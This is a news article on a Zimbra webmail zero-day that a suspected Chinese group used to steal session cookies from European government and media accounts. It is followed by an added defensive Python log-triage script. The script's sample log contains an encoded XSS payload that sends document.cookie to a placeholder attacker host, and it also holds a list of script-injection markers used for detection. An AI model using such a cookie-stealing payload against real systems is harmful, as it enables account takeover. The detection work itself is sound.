European governments targeted by Chinese hackers with a Zimbra webmail zero-day

A new Chinese cyber-espionage group has been seen abusing a zero-day vulnerability in the Zimbra collaboration suite to gain access to the email inboxes of European governments and media agencies.

The attacks were spotted last month by security firm Volexity, and although the firm notified Zimbra on December 16, the company has not yet released a patch for its product.

Earlier today, Volexity published a technical report on the attacks in the hope of raising awareness of the issue and allowing organizations that run a Zimbra email server to review whether they have been targeted.

Hackers stole cookies to access targeted accounts

According to Volexity, the attackers first began exploiting this zero-day on December 14, when its researchers spotted the initial attacks against some of its customers.

Volexity said the attacks were split into two stages. In the first, the hackers sent a benign email meant to perform reconnaissance and determine whether accounts were active and whether users would be willing to open unusual emails from unknown senders.

The actual attack took place in a second email, in which the hackers included a link in the email body. If users visited the URL, they landed on a remote site where malicious JavaScript code would execute a cross-site scripting (XSS) attack against their organization's Zimbra webmail application.

The Volexity team said this code exploited a flaw in Zimbra webmail clients running versions 8.8.15 P29 and P30 and allowed the attackers to steal the Zimbra session cookies.

With those cookies, the attackers could connect to a Zimbra account, from where they could gain access to emails, send additional phishing messages to a user's contacts, and even prompt users to download malware.

Image: Volexity

While there are currently more than 33,000 Zimbra servers connected to the internet, Volexity said the zero-day does not work against Zimbra 9.x installs, the latest version of the platform, meaning the attack surface is not as large as initially thought.

The security firm said that, based on the attacker infrastructure used in these attacks, it has not been able to link this threat actor, which it has named TEMP_Heretic, to a previously known group or activity cluster.

However, based on the techniques used in the attacks, Volexity said it believes "the attacker is likely Chinese in origin."

The security firm said that, based on its visibility, it has seen TEMP_Heretic attacking European governments and media agencies; however, the group is believed to have attacked many other targets.

IT administrators who run Zimbra email servers and want to know whether they have been targeted are advised to check the Volexity report. The security firm said TEMP_Heretic typically used emails posing as invitations, refunds, warnings, and emails with no subject lines as lures for its attacks.
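As an added example (not part of the original article, and not Volexity's or Zimbra's tooling), the script below applies the two observations above, a webmail request arriving from an external lure page with script-like content in its URL, and a session cookie later reused from a different client address, to a constructed reverse-proxy access log. It assumes the proxy writes Combined Log Format with the session cookie value appended as one extra quoted field; the hostnames, paths, cookie values and log lines are made up. A payload delivered in a POST body, or injected by the attacker page through some other channel, would not show up in this URL check, so a clean result here is not proof of absence.

```python
"""Access-log triage for the two-stage pattern described above:
(1) a browser reaching the webmail from an external page with script-like
content in the request URL, then (2) the same session cookie being reused
from a different client address.  Added example, not Volexity's or Zimbra's
code.  Assumes the reverse proxy in front of the webmail writes Combined
Log Format with the session cookie appended as one extra quoted field; the
hostnames, paths and log lines below are constructed for illustration."""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Hostnames a legitimate in-app navigation may carry in the Referer (assumed).
TRUSTED_HOSTS = {"webmail.example.gov"}

# Constructed sample log (not real traffic): an external lure page sends the
# victim to the webmail with an encoded script payload, and the session is
# later replayed from another address with a non-browser client.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2021:09:01:10 +0000] "GET /zimbra/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "sess=aaa111"
203.0.113.5 - - [14/Dec/2021:09:02:33 +0000] "GET /zimbra/?view=%3Cscript%3Elocation%3D%27https%3A%2F%2Fattacker.example%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 4097 "https://attacker.example/lure" "Mozilla/5.0" "sess=aaa111"
198.51.100.77 - - [14/Dec/2021:09:05:02 +0000] "GET /zimbra/mail HTTP/1.1" 200 8870 "-" "curl/7.79" "sess=aaa111"
203.0.113.9 - - [14/Dec/2021:09:06:00 +0000] "GET /zimbra/?q=budget HTTP/1.1" 200 3001 "https://webmail.example.gov/zimbra/" "Mozilla/5.0" "sess=bbb222"
"""

# Combined Log Format plus one trailing quoted field holding the session cookie.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<session>[^"]*)"$'
)

# Fragments that should never appear in a URL handed to a webmail application.
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=", "document.cookie")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def has_script_payload(path):
    """True if the percent-decoded request path contains an XSS-style fragment."""
    decoded = unquote(path).lower()
    return any(marker in decoded for marker in SCRIPT_MARKERS)


def referer_host(referer):
    """Hostname of the Referer header, or None when it is absent ("-")."""
    if not referer or referer == "-":
        return None
    return urlsplit(referer).hostname


def find_suspicious_requests(entries, trusted_hosts):
    """Stage 1: requests that arrive from an external page carrying a script payload."""
    hits = []
    for e in entries:
        host = referer_host(e["referer"])
        if host is not None and host not in trusted_hosts and has_script_payload(e["path"]):
            hits.append({"ip": e["ip"], "ts": e["ts"], "path": e["path"],
                         "referer_host": host, "session": e["session"]})
    return hits


def find_session_reuse(entries):
    """Stage 2: session cookies observed from more than one client address."""
    ips_by_session = defaultdict(set)
    for e in entries:
        if e["session"] and e["session"] != "-":
            ips_by_session[e["session"]].add(e["ip"])
    return {s: ips for s, ips in ips_by_session.items() if len(ips) > 1}


def triage(log_text, trusted_hosts=TRUSTED_HOSTS):
    """Run both checks over raw log text; returns (suspicious_requests, reused_sessions)."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    return find_suspicious_requests(entries, trusted_hosts), find_session_reuse(entries)


if __name__ == "__main__":
    suspicious, reused = triage(SAMPLE_LOG)
    for hit in suspicious:
        print(f"[stage 1] {hit['ts']} {hit['ip']} via {hit['referer_host']}: {unquote(hit['path'])}")
    for session, ips in reused.items():
        print(f"[stage 2] {session} used from {sorted(ips)}")
```

Point `triage()` at a real proxy log only after adjusting `LINE_RE` to that log's actual format and `TRUSTED_HOSTS` to the webmail's own hostnames; the session-reuse check is the more robust of the two, since it does not depend on the payload being visible in a URL, but it will also fire on benign address changes such as a user moving between networks, so treat its output as a lead for review rather than a verdict.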

Catalin Cimpanu is a cybersecurity reporter for The Record. He previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.



https://therecord.media/european-governments-targeted-by-chinese-hackers-with-a-zimbra-webmail-zero-day/